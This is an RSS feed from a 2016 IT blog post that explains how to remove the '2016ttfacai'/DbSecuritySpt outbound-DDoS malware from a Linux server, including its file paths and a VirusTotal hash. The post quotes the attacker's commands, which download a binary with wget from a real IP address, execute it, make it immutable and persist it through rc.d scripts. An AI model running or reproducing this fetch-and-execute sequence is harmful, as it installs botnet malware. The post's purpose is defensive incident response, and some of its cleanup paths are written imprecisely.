<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>DDOS attack 2016ttfacai Archives - IT Asset Management Software</title>
	<atom:link href="https://itassetmanagement.in/tag/ddos-attack-2016ttfacai/feed/" rel="self" type="application/rss+xml" />
	<link>https://itassetmanagement.in/tag/ddos-attack-2016ttfacai/</link>
	<description>best hardware inventory software</description>
	<lastBuildDate>Sat, 28 May 2016 09:08:14 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.8.13</generator>

<image>
	<url>https://itassetmanagement.in/wp-content/uploads/2015/12/cropped-logo-32x32.png</url>
	<title>DDOS attack 2016ttfacai Archives - IT Asset Management Software</title>
	<link>https://itassetmanagement.in/tag/ddos-attack-2016ttfacai/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>DDOS attack 2016ttfacai  or DBsecurityspt</title>
		<link>https://itassetmanagement.in/ddos-attack-2016ttfacai-dbsecurityspt/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ddos-attack-2016ttfacai-dbsecurityspt</link>
					<comments>https://itassetmanagement.in/ddos-attack-2016ttfacai-dbsecurityspt/#respond</comments>
		
		<dc:creator><![CDATA[admin]]></dc:creator>
		<pubDate>Sat, 28 May 2016 09:01:47 +0000</pubDate>
				<category><![CDATA[Comingtime]]></category>
		<category><![CDATA[Quick Tips]]></category>
		<category><![CDATA[Technology Tips]]></category>
		<category><![CDATA[/root/2016ttfacai]]></category>
		<category><![CDATA[2016ttfacai]]></category>
		<category><![CDATA[DBsecurityspt]]></category>
		<category><![CDATA[DDOS attack 2016ttfacai]]></category>
		<category><![CDATA[DDOS attack 2016ttfacai solved]]></category>
		<category><![CDATA[DDOS Class ELF32]]></category>
		<category><![CDATA[Gate.lod DDOS]]></category>
		<category><![CDATA[not able to delete file from root ubuntu]]></category>
		<category><![CDATA[outbound ddos DBsecurityspt]]></category>
		<category><![CDATA[Outbound DDOS on webmin]]></category>
		<category><![CDATA[wordpress outbound ddos]]></category>
		<guid isPermaLink="false">https://itassetmanagement.in/blog/?p=2613</guid>

					<description><![CDATA[<p>Problem Statement: Hacked: OUTBOUND DDOS attack 2016ttfacai  or DBsecurityspt SOLVED &#160; If you detected an outbound denial of service attack originating from your server and its impacted your website. If you discover that a process internal to your server is sending large amounts of malicious traffic towards other servers and your service provider applied network</p>
<p>The post <a href="https://itassetmanagement.in/ddos-attack-2016ttfacai-dbsecurityspt/">DDOS attack 2016ttfacai  or DBsecurityspt</a> appeared first on <a href="https://itassetmanagement.in">IT Asset Management Software</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><strong>Problem Statement:</strong></p>
<p><strong>Hacked: OUTBOUND DDOS attack 2016ttfacai  or DBsecurityspt SOLVED</strong></p>
<p>&nbsp;</p>
<p>If you detected an outbound denial of service attack originating from your server and its impacted your website. If you discover that a process internal to your server is sending large amounts of malicious traffic towards other servers and your service provider applied network restrictions to your server to mitigate this issue. Here is the way to solve this:-<br />
Step 1: Put network restriction on your server for outgoing traffic. If you are using the Linux firewall<br />
Go to 3rd Outgoing packets (OUTPUT) &#8211; Only applies to packets originated by this host</p>
<div id="attachment_2619" style="width: 554px" class="wp-caption alignnone"><a href="https://itassetmanagement.in/blog/wp-content/uploads/2016/05/2016ttfacaii-1.jpg" rel="attachment wp-att-2619"><img aria-describedby="caption-attachment-2619" loading="lazy" class="size-full wp-image-2619" src="https://itassetmanagement.in/blog/wp-content/uploads/2016/05/2016ttfacaii-1.jpg" alt="Dbsecuritysc " width="544" height="82" srcset="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1.jpg 544w, https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1-300x45.jpg 300w, https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1-280x42.jpg 280w" sizes="(max-width: 544px) 100vw, 544px" /></a><p id="caption-attachment-2619" class="wp-caption-text">2016ttfacaii</p></div>
<p>Step 2: First create backup image of your server so that your data is not lost: CREATE SNAPSHOT</p>
<p>Step 3: If you are using Webmin look for BOOTUP and SHUTDOWN in System and look for Service “DBsecurity” If yes then your system is compromised<br />
You will find service call 2016ttfacai is running and when you tried to kill. It will start again!<br />
How to fix or Kill this Alien?<br />
How to Kill 2016ttfacai<br />
Step1: Create new virtual server and restore your backup snapshot created above.<br />
Step2: Delete all the files from the following folder<br />
1. /root/2016ttfacai<br />
2. ./etc/init.d/DbSecuritySpt<br />
3. etc/rc3.d/S97DbSecuritySpt<br />
4. ./etc/rc3.d/S97DbSecuritySpt<br />
5. ./etc/rc5.d/S97DbSecuritySpt<br />
6. /temp/gates.lod/temp/mod.lod<br />
7. /root/Conf.n</p>
<p>Manually stop all DBsecurityspt and 2016ttfacai from Services and Boot &amp; Shutdown process<br />
Repeat step2 again after stopping all the services<br />
Step 3: Restart your server and see if above service are still running.</p>
<div id="attachment_2620" style="width: 635px" class="wp-caption alignnone"><a href="https://itassetmanagement.in/blog/wp-content/uploads/2016/05/2016ttfacaii1.jpg" rel="attachment wp-att-2620"><img aria-describedby="caption-attachment-2620" loading="lazy" class="size-full wp-image-2620" src="https://itassetmanagement.in/blog/wp-content/uploads/2016/05/2016ttfacaii1.jpg" alt="Outbound ddos attack" width="625" height="112" srcset="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1.jpg 625w, https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1-600x108.jpg 600w, https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1-300x54.jpg 300w, https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1-280x50.jpg 280w" sizes="(max-width: 625px) 100vw, 625px" /></a><p id="caption-attachment-2620" class="wp-caption-text">Outbound ddos attack</p></div>
<p>Note: If you are not able to delete files you need to running following command<br />
# lsattr</p>
<p>if you notice i or a for 2016ttfacai<br />
# man chattr<br />
# chattr -i [filename]
# chattr -a [filename]
<p>Here what you can also check the commands run by the Alien<br />
ps -ef<br />
passwd<br />
wget http://202.146.220.76:7777/2016ttfacai<br />
chmod +x 2016ttfacai<br />
./2016ttfacai<br />
chattr +i 2016ttfacai<br />
./etc/init.d/DbSecuritySpt:/root/2016ttfacai<br />
./etc/rc3.d/S97DbSecuritySpt:/root/2016ttfacai<br />
./etc/rc5.d/S97DbSecuritySpt:/root/2016ttfacai<br />
./etc/rc4.d/S97DbSecuritySpt:/root/2016ttfacai<br />
./etc/rc1.d/S97DbSecuritySpt:/root/2016ttfacai<br />
Process: Summary:<br />
11126<br />
root 73.50 MB /root/2016ttfacai</p>
<p>If you succeeded in deleting the Alien and stopping all the services after restarting your server. Swap your ip with old server and delete old server.<br />
Excellent you are back in business!!!<br />
Say thank you to author</p>
<p>Details of 2016ttfacai:<br />
https://www.virustotal.com/en/file/af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861/analysis/1459952498/<br />
SHA256:af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861File name:2016ttfacaiDetection ratio:29 / 57Analysis date:2016-04-06 14:21:38 UTC ( 1 month, 3 weeks ago ) View latest<br />
Class ELF32<br />
Data 2&#8217;s complement, little endian<br />
Header version 1 (current)<br />
OS ABI UNIX &#8211; System V<br />
ABI version 0<br />
Object file type EXEC (Executable file)<br />
Required architecture Intel 80386<br />
Object file version 0x1<br />
Program headers 5<br />
Section headers 28<br />
Name Type Address Offset Size Flags<br />
NULL 0x00000000 0x00000000 0<br />
.note.ABI-tag NOTE 0x080480d4 0x000000d4 32 A<br />
.init PROGBITS 0x080480f4 0x000000f4 23 A, X<br />
.text PROGBITS 0x08048120 0x00000120 744640 A, X<br />
__libc_thread_freeres_fn PROGBITS 0x080fdde0 0x000b5de0 226 A, X<br />
__libc_freeres_fn PROGBITS 0x080fdec4 0x000b5ec4 3950 A, X<br />
.fini PROGBITS 0x080fee34 0x000b6e34 26 A, X<br />
.rodata PROGBITS 0x080fee60 0x000b6e60 120986 A<br />
__libc_atexit PROGBITS 0x0811c6fc 0x000d46fc 4 A<br />
__libc_subfreeres PROGBITS 0x0811c700 0x000d4700 60 A</p>
<p>MIMEType<br />
application/octet-stream</p>
<p>CPUByteOrder<br />
Little endian</p>
<p>CPUArchitecture<br />
32 bit</p>
<p>FileType<br />
ELF executable</p>
<p>ObjectFileType<br />
Executable file</p>
<p>CPUType<br />
i386</p>
<p>The post <a href="https://itassetmanagement.in/ddos-attack-2016ttfacai-dbsecurityspt/">DDOS attack 2016ttfacai  or DBsecurityspt</a> appeared first on <a href="https://itassetmanagement.in">IT Asset Management Software</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://itassetmanagement.in/ddos-attack-2016ttfacai-dbsecurityspt/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		
		<media:thumbnail url="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1-150x82.jpg" />
		<media:content url="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1.jpg" medium="image">
			<media:title type="html">2016ttfacaii</media:title>
			<media:description type="html">2016ttfacaii</media:description>
			<media:thumbnail url="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii-1-150x82.jpg" />
		</media:content>
		<media:content url="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1.jpg" medium="image">
			<media:title type="html">2016ttfacaii1</media:title>
			<media:description type="html">Outbound ddos attack</media:description>
			<media:thumbnail url="https://itassetmanagement.in/wp-content/uploads/2016/05/2016ttfacaii1-150x112.jpg" />
		</media:content>
	</item>
	</channel>
</rss>
